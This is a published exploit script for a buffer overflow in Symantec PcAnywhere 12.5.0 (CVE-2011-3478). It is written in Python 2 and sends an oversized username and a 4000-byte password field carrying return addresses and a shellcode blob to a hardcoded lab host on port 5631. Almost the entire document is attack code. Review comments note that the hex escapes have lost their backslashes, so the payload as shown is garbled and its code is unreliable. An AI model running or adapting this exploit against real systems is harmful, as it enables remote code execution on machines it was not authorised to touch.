
Symantec PcAnywhere 12.5.0 Buffer Overflow

Posted on 27 June 2012

#!/usr/bin/python
# Exploit Title: Symantec PcAnywhere login and password field buffer overflow
# Date: 2012.06.27
# Author: S2 Crew [Hungary]
# Software Link: symantec.com
# Version: 12.5.0
# Tested on: Windows XP SP2
# CVE: CVE-2011-3478
# Code :
#
# NOTE(review): this listing is Python 2 (print statements, str payloads).
# The hex escapes in the string literals below have lost their backslashes
# in this copy, so as written every payload literal is plain ASCII text
# rather than the byte values the author intended.
import socket
import time
import struct
import string
import sys

# Payload string appended to the oversized password field (see init4).
shell = (
    "xdaxdaxbbx9ex7fxfbx04xd9x74x24xf4x58x2bxc9"
    "xb1x56x31x58x18x03x58x18x83xc0x9ax9dx0exf8"
    "x4axe8xf1x01x8ax8bx78xe4xbbx99x1fx6cxe9x2d"
    "x6bx20x01xc5x39xd1x92xabx95xd6x13x01xc0xd9"
    "xa4xa7xccxb6x66xa9xb0xc4xbax09x88x06xcfx48"
    "xcdx7bx3fx18x86xf0xedx8dxa3x45x2dxafx63xc2"
    "x0dxd7x06x15xf9x6dx08x46x51xf9x42x7exdaxa5"
    "x72x7fx0fxb6x4fx36x24x0dx3bxc9xecx5fxc4xfb"
    "xd0x0cxfbx33xddx4dx3bxf3x3dx38x37x07xc0x3b"
    "x8cx75x1exc9x11xddxd5x69xf2xdfx3axefx71xd3"
    "xf7x7bxddxf0x06xafx55x0cx83x4exbax84xd7x74"
    "x1exccx8cx15x07xa8x63x29x57x14xdcx8fx13xb7"
    "x09xa9x79xd0xfex84x81x20x68x9exf2x12x37x34"
    "x9dx1exb0x92x5ax60xebx63xf4x9fx13x94xdcx5b"
    "x47xc4x76x4dxe7x8fx86x72x32x1fxd7xdcxecxe0"
    "x87x9cx5cx89xcdx12x83xa9xedxf8xb2xedx23xd8"
    "x97x99x41xdex06x06xcfx38x42xa6x99x93xfax04"
    "xfex2bx9dx77xd4x07x36xe0x60x4ex80x0fx71x44"
    "xa3xbcxd9x0fx37xafxddx2ex48xfax75x38x71x6d"
    "x0fx54x30x0fx10x7dxa2xacx83x1ax32xbaxbfxb4"
    "x65xebx0excdxe3x01x28x67x11xd8xacx40x91x07"
    "x0dx4ex18xc5x29x74x0ax13xb1x30x7excbxe4xee"
    "x28xadx5ex41x82x67x0cx0bx42xf1x7ex8cx14xfe"
    "xaax7axf8x4fx03x3bx07x7fxc3xcbx70x9dx73x33"
    "xabx25x83x7exf1x0cx0cx27x60x0dx51xd8x5fx52"
    "x6cx5bx55x2bx8bx43x1cx2exd7xc3xcdx42x48xa6"
    "xf1xf1x69xe3"
)

init1 = (
    "x00x00x00x00"  # initial handshake (author's note, translated from Hungarian)
)
init2 = (
    "x0dx06xfe"  # followed by the "Enter username" message (NTdialog) (author's note, translated)
)
init3 = (
    "A" * 100  #+ " " #username  -- 100-byte username field
)

# Three 4-byte little-endian values spliced into the password field.
# Their meaning is only what the variable names state; the values are
# specific to the author's "Tested on: Windows XP SP2" setup.
readable_xp_sp2 = struct.pack('<L',0x023E5AD0)
call_esi = struct.pack('<L',0x67f7aac4)
jmp = struct.pack('<L',0x414112EB)

# Password field: 1282 filler bytes, the three packed values with 4-byte
# spacers, the shell string, then "E" padding so the field is 4000 bytes
# in total. NOTE(review): a 4000-byte password field on the PcAnywhere
# port is itself an anomaly worth alerting on.
init4 = (
    "B" * 1282 + jmp + readable_xp_sp2 + "DDDD" +call_esi + "AAAA" + shell + "E" * (4000 - 1286 - 12 - len(shell))
)

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('172.16.29.133',5631)) # hardcoded IP address (author's lab host); TCP/5631 is the PcAnywhere data port used here

# The four packets are sent in order with fixed 5-second pauses; the
# replies are read but never inspected, so there is no error handling
# if the service answers unexpectedly or closes the connection.
print "init packet..."
s.send(init1) # send the data
time.sleep(5)
data = s.recv(1024)
print "handshake packet..."
s.send(init2) # send the data
time.sleep(5)
data = s.recv(1024)
print "username packet..."
s.send(init3) # send the data
time.sleep(5)
#data = s.recv(1024)
print "password packet..."
s.send(init4) # send the data
s.close()

 
